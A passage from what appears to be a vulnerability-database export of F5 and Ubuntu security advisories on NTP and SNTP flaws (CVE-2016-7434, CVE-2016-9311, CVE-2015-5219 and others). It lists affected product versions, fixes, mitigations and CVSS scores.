policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-03-14T19:23:00", "published": "2016-12-17T02:37:00", "href": "https://support.f5.com/csp/article/K80996302", "id": "F5:K80996302", "type": "f5", "title": "Multiple NTP vulnerabilities", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-06-08T00:16:16", "bulletinFamily": "software", "cvelist": ["CVE-2016-7434"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.1| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.1 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-02-08T00:32:00", "published": "2016-11-30T00:10:00", "href": "https://support.f5.com/csp/article/K63326092", "id": "F5:K63326092", "type": "f5", "title": "NTP vulnerability CVE-2016-7434", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-09T00:21:22", "bulletinFamily": "software", "cvelist": ["CVE-2016-7426"], "description": "\nF5 Product Development has assigned ID 630969 (BIG-IP) and INSTALLER-2824 (Traffix SDC) to this vulnerability. Additionally, [BIG-IP iHealth](<http://http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H51444934 on the **Diagnostics** > **Identified** > **Low** screen. \n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 \n11.2.1 \n10.2.1 - 10.2.4 | Low | **ntpd** \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 | Low | **ntpd** \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 | Low | **ntpd** \nBIG-IP Analytics | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 \n11.2.1 | Low | **ntpd** \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 \n11.2.1 \n10.2.1 - 10.2.4 | Low | **ntpd** \nBIG-IP ASM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 \n11.2.1 \n10.2.1 - 10.2.4 | Low | **ntpd** \nBIG-IP DNS | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF1 \n12.1.2 HF1 | Low | **ntpd** \nBIG-IP Edge Gateway | None | 11.2.1 \n10.2.1 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | 11.6.1 \n11.5.3 - 11.5.5 | 11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 \n11.2.1 \n10.2.1 - 10.2.4 | Low | **ntpd** \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 \n11.2.1 \n10.2.1 - 10.2.4 | Low | **ntpd** \nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 \n11.5.3 - 11.5.5 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 \n11.5.0 - 11.5.2 \n11.4.1 | Low | **ntpd** \nBIG-IP PSM | None | 11.4.1 \n10.2.1 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.2.1 \n10.2.1 - 10.2.4 | Not vulnerable | None \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.6.2 \n11.6.0 | Low | **ntpd** \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.1.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.0.2 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Low | **ntpd**\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone. To avoid vulnerability exposure, F5 recommends removing the** limited** directive from **ntpd** restriction statements.\n\n**Impact of action:** Various F5 product features rely on proper date and time configuration; ensure that any modifications to the **ntpd** configuration are compatible with your environment.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-10-31T17:38:00", "published": "2016-12-20T01:28:00", "id": "F5:K51444934", "href": "https://support.f5.com/csp/article/K51444934", "title": "NTP vulnerability CVE-2016-7426", "type": "f5", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-06T10:21:42", "bulletinFamily": "software", "cvelist": ["CVE-2016-9311"], "edition": 1, "description": "\nF5 Product Development has assigned ID 631841 (BIG-IP), ID 632399 (BIG-IQ), ID 632560 (Enterprise Manager), ID 633055-8 (F5 iWorkflow), and INSTALLER-2825 (Traffix SDC) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H55405388 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP AAM| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP AFM| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP Analytics| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP APM| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP ASM| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP DNS| 13.0.0 \n12.0.0 - 12.1.2| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP Edge Gateway| 11.2.1 \n10.2.1 - 10.2.4| None| Medium| ntpd \nBIG-IP GTM| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| ntpd \nBIG-IP Link Controller| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP PEM| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0 HF1 \n12.1.2 HF1| Medium| ntpd \nBIG-IP PSM| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| None| Medium| ntpd \nBIG-IP WebAccelerator| 11.2.1 \n10.2.1 - 10.2.4| None| Medium| ntpd \nBIG-IP WebSafe| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| 13.0.0 HF1 \n12.1.2 HF1| Medium \n\n| ntpd \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.1.1| None| Medium| ntpd \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Medium| ntpd \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Medium| ntpd \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Medium| ntpd \nBIG-IQ ADC| 4.5.0| None| Medium| ntpd \nBIG-IQ Centralized Management| 5.0.0 - 5.2.0 \n4.6.0| None| Medium| ntpd \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Medium| ntpd \nF5 iWorkflow| 2.0.0 - 2.2.0| None| Medium| ntpd \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| None| Low| ntpd\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nAvoid enabling the NTP trap service on the BIG-IP system. This option is blocked, by default, on the BIG-IP system.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n", "modified": "2017-07-06T08:46:00", "published": "2016-12-31T00:35:00", "href": "https://support.f5.com/csp/article/K55405388", "id": "F5:K55405388", "type": "f5", "title": "NTP vulnerability CVE-2016-9311", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-11-30T01:28:04", "bulletinFamily": "software", "cvelist": ["CVE-2016-7434"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-11-29T00:00:00", "published": "2016-11-29T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/63/sol63326092.html", "id": "SOL63326092", "type": "f5", "title": "SOL63326092 - NTP vulnerability CVE-2016-7434", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-06-08T00:16:19", "bulletinFamily": "software", "cvelist": ["CVE-2016-9310"], "edition": 1, "description": "\nF5 Product Development has assigned ID 631836 (BIG-IP), ID 633055 (F5 iWorkflow), ID 632399 (BIG-IQ), and ID 632560 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H87922456 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| **ntpd** \nBIG-IP AAM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| None| Medium| **ntpd** \nBIG-IP AFM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| None| Medium| **ntpd** \nBIG-IP Analytics| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| None| Medium| **ntpd** \nBIG-IP APM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| **ntpd** \nBIG-IP ASM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| **ntpd** \nBIG-IP DNS| 12.0.0 - 12.1.2| None| Medium| **ntpd** \nBIG-IP Edge Gateway| 11.2.1 \n10.2.1 - 10.2.4| None| Medium| **ntpd** \nBIG-IP GTM| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| **ntpd** \nBIG-IP Link Controller| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| **ntpd** \nBIG-IP PEM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| None| Medium| **ntpd** \nBIG-IP PSM| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| None| Medium| **ntpd** \nBIG-IP WebAccelerator| 11.2.1 \n10.2.1 - 10.2.4 \nNone| None| Medium| **ntpd** \nBIG-IP WebSafe| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| None| Medium| **ntpd** \nARX| None| 6.2.0 - 6.4.0| Not vulnerable1| None \nEnterprise Manager| 3.1.1| None| Medium| **ntpd** \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Medium| **ntpd** \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Medium| **ntpd** \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Medium| **ntpd** \nBIG-IQ ADC| 4.5.0| None| Medium| **ntpd** \nBIG-IQ Centralized Management| 5.0.0 - 5.1.0 \n4.6.0| None| Medium| **ntpd** \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Medium| **ntpd** \nF5 iWorkflow| 2.0.0 - 2.0.2| None| Medium| **ntpd** \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable1| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable1| None \n \n1 The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nThere is no mitigation. To avoid vulnerability exposure, F5 recommends that you do not remove the **restrict default noquery** statement from the **ntpd** configuration.\n\n**Impact of recommendation:** Various F5 product features rely on proper date and time configuration; ensure that any modifications to the **ntpd** configuration are compatible with your environment.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K14120: Defining advanced NTP configurations on the BIG-IP system (11.x - 12.x)](<https://support.f5.com/csp/article/K14120>)\n * [Internet Engineering Task Force (RFC 2827) - Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing](<https://tools.ietf.org/html/rfc2827>)\n\n**Note**: This link takes you to a resource outside of AskF5. The third party could remove the document without our knowledge.\n", "modified": "2017-04-06T00:44:00", "published": "2016-12-22T04:26:00", "href": "https://support.f5.com/csp/article/K87922456", "id": "F5:K87922456", "type": "f5", "title": "NTP vulnerability CVE-2016-9310", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-06-28T14:42:25", "bulletinFamily": "software", "cvelist": ["CVE-2015-5219"], "description": "\nF5 Product Development has assigned ID 568151 (BIG-IP) and ID 568164 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Low| SNTP \nBIG-IP AAM| None| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Not vulnerable| None \nBIG-IP AFM| 11.3.0*| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Low| SNTP \nBIG-IP Analytics| 11.0.0 - 11.3.0*| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Low| SNTP \nBIG-IP APM| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Low| SNTP \nBIG-IP ASM| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Low| SNTP \nBIG-IP DNS| None| 13.0.0 \n12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| None| Low| SNTP \nBIG-IP GTM| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| 11.4.0 - 11.6.0| Low| SNTP \nBIG-IP Link Controller| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Low| SNTP \nBIG-IP PEM| 11.3.0*| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Low| SNTP \nBIG-IP PSM| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| 11.4.0 - 11.4.1| Low| SNTP \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| None| Low| SNTP \nBIG-IP WOM| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| None| Low| SNTP \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1 HF5*| 3.1.1 HF6| Low| SNTP \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None \n \n* The SNTP binary is included in BIG-IP 10.1.0 through 11.3.0, and Enterprise Manager 3.x; however, SNTP binary is not used by the BIG-IP and Enterprise Manager systems by default. In BIG-IP 11.4.0 and later, the SNTP binary is removed.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you can avoid launching the SNTP process manually.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9856: The BIG-IP system does not support time synchronization using SNTP](<https://support.f5.com/csp/article/K9856>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n", "edition": 1, "modified": "2018-02-06T01:02:00", "published": "2016-01-20T01:20:00", "id": "F5:K60352002", "href": "https://support.f5.com/csp/article/K60352002", "title": "SNTP vulnerability CVE-2015-5219", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2016-09-26T17:23:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-5219"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you can avoid launching the SNTP process manually.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL9856: The BIG-IP system does not support time synchronization using SNTP\n * SOL4602: Overview of the F5 security vulnerability response policy\n", "modified": "2016-07-15T00:00:00", "published": "2016-01-20T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/60/sol60352002.html", "id": "SOL60352002", "title": "SOL60352002 - SNTP vulnerability CVE-2015-5219", "type": "f5", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:29", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7434", "CVE-2016-9311", "CVE-2017-6460", "CVE-2016-7433", "CVE-2017-6458", "CVE-2016-7427", "CVE-2016-9042", "CVE-2017-6462", "CVE-2016-7429", "CVE-2017-6463", "CVE-2016-2519", "CVE-2016-7428", "CVE-2016-9310", "CVE-2017-6464", "CVE-2016-7426", "CVE-2016-7431"], "description": "Yihan Lian discovered that NTP incorrectly handled certain large request \ndata values. A remote attacker could possibly use this issue to cause NTP \nto crash, resulting in a denial of service. This issue only affected \nUbuntu 16.04 LTS. (CVE-2016-2519)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain spoofed \naddresses when performing rate limiting. A remote attacker could possibly \nuse this issue to perform a denial of service. This issue only affected \nUbuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2016-7426)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain crafted \nbroadcast mode packets. A remote attacker could possibly use this issue to \nperform a denial of service. This issue only affected Ubuntu 14.04 LTS, \nUbuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2016-7427, CVE-2016-7428)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain responses. \nA remote attacker could possibly use this issue to perform a denial of \nservice. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and \nUbuntu 16.10. (CVE-2016-7429)\n\nSharon Goldberg and Aanchal Malhotra discovered that NTP incorrectly \nhandled origin timestamps of zero. A remote attacker could possibly use \nthis issue to bypass the origin timestamp protection mechanism. This issue \nonly affected Ubuntu 16.10. (CVE-2016-7431)\n\nBrian Utterback, Sharon Goldberg and Aanchal Malhotra discovered that NTP \nincorrectly performed initial sync calculations. This issue only applied \nto Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7433)\n\nMagnus Stubman discovered that NTP incorrectly handled certain mrulist \nqueries. A remote attacker could possibly use this issue to cause NTP to \ncrash, resulting in a denial of service. This issue only affected Ubuntu \n16.04 LTS and Ubuntu 16.10. (CVE-2016-7434)\n\nMatthew Van Gund discovered that NTP incorrectly handled origin timestamp \nchecks. A remote attacker could possibly use this issue to perform a denial \nof service. This issue only affected Ubuntu Ubuntu 16.10, and Ubuntu 17.04. \n(CVE-2016-9042)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain control \nmode packets. A remote attacker could use this issue to set or unset traps. \nThis issue only applied to Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu \n16.10. (CVE-2016-9310)\n\nMatthew Van Gundy discovered that NTP incorrectly handled the trap service. \nA remote attacker could possibly use this issue to cause NTP to crash, \nresulting in a denial of service. This issue only applied to 